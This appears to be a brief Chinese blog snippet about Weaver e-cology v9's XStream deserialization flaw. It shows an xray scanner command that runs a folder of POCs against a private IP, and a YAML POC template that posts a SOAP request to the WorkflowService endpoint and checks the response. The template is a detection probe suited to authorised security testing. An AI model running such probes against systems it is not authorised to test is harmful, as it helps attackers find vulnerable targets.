本文最后更新于 396 天前,其中的信息可能已经有所发展或是发生改变。
// 使用指定目录下全部的POC进行扫描
./xray webscan --plugins phantasm --poc "./POC/**" --url http://172.16.10.3
name: poc-yaml-e-colory-v9-deserialization
rules:
- method: POST
path: "/services/WorkflowServiceXml"
headers:
User-Agent: "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
Content-Type: "text/xml"
body: |
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest>
<web:string></web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>
expression: |
response.status==200 && response.body.bcontains(b'doCreateWorkflow')
detail:
author: yulate(https://www.yulate.com)
links:
- https://cangqingzhe.github.io/2021/05/15/%E6%B3%9B%E5%BE%AEXstream%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
浏览量: 176